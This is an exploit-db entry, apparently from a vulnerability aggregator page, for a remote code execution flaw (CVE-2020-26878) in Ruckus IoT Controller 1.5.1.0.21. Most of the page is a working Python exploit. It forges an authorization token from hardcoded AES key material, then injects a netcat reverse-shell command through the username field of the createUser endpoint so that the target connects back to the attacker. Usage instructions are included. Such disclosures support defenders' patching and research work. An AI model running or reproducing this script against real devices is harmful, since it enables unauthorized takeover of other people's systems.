Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution

🗓️ 27 Nov 2020 00:00:00Reported by Emre SURENType

exploitdb🔗 www.exploit-db.com👁 849 Views

Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution, Command Injection & Broken Authentication, CVE-2020-2687

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2020-26878	27 Oct 202020:10	–	circl
Check Point Advisories	Ruckus IoT Controller Web UI Command Injection (CVE-2020-26878)	21 Nov 202000:00	–	checkpoint_advisories
CVE	CVE-2020-26878	26 Oct 202019:13	–	cve
Cvelist	CVE-2020-26878	26 Oct 202019:13	–	cvelist
NVD	CVE-2020-26878	26 Oct 202020:15	–	nvd
Packet Storm	Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution	27 Nov 202000:00	–	packetstorm
Prion	Command injection	26 Oct 202020:15	–	prion
RedhatCVE	CVE-2020-26878	22 May 202515:24	–	redhatcve
ThreatPost	ZuoRAT Can Take Over Widely Used SOHO Routers	30 Jun 202217:20	–	threatpost
VulnCheck KEV	VulnCheck KEV: CVE-2020-26878	28 Jun 202200:00	–	vulncheck_kev

# Product: Ruckus IoT Controller (Ruckus vRIoT)
# Version: <= 1.5.1.0.21
# Vendor: https://support.ruckuswireless.com/
# Vulnerability: Command Injection & Broken Authentication
# References: CVE-2020-26878
# Discovered by: Juan Manuel Fernandez
# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
# Exploit Author: Emre SUREN
# Disclosure Date: 2020-10-26
# Tested on: Appliance

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests, urllib3, sys
from Crypto.Cipher import AES
from base64 import b64encode, b64decode
from colorama import Fore
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def listen(lhost, lport):
	opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
	if opt == "y":
		return True
	else:
		return False

def generatePayload(lhost, lport):

	payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"

	return payload

def generateMagicToken():

	enc_dec_method = 'utf-8'
	salt = 'nplusServiceAuth'
	salt = salt.encode("utf8")
	str_key = 'serviceN1authent'
	str_to_enc = 'TlBMVVMx'

	return encrypt(enc_dec_method, salt, str_key, str_to_enc)

def encrypt(enc_dec_method, salt, str_key, str_to_enc):

	aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
	hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
	mret = b64encode(hx_enc).decode(enc_dec_method)

	return mret

def execCmd(rhost, rport, lhost, lport):

	payload = generatePayload(lhost, lport)
	post_data = {
	   "username": payload,
	   "password": "test"
	}
	print(Fore.BLUE + "[*] Payload\t: " + payload)

	token = generateMagicToken()
	headers = {
		"Authorization": token
	}

	rpath = "/service/v1/createUser"
	uri = 'https://' + rhost + ":" + rport + rpath

	r = requests.post(uri, json=post_data, headers=headers, verify=False)
	print(Fore.BLUE + "[*] Request sent")

	if r.status_code == 200:    
		print(Fore.GREEN + "[+] Successful. Check for the session...")
	else:
		print(Fore.RED + "[X] Failed. Check for the response...")
		print(Fore.BLUE + "[*] Response\t: " + r.text)
		sys.exit()

def main():

	if (len(sys.argv) != 5):
		print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
		print("[*] <RHOST> -> Target IP")
		print("[*] <RPORT> -> Target Port")
		print("[*] <LHOST> -> Attacker IP")
		print("[*] <LPORT> -> Attacker Port")
		print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
		exit(0)

	rhost = sys.argv[1]
	rport = sys.argv[2]
	lhost = sys.argv[3]
	lport = sys.argv[4]

	if not listen(lhost, lport):
		print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
	else:
		execCmd(rhost, rport, lhost, lport)

if __name__ == "__main__":
    main()

27 Nov 2020 00:00Current

7High risk

Vulners AI Score7

CVSS 3.18.8

CVSS 29

EPSS0.62973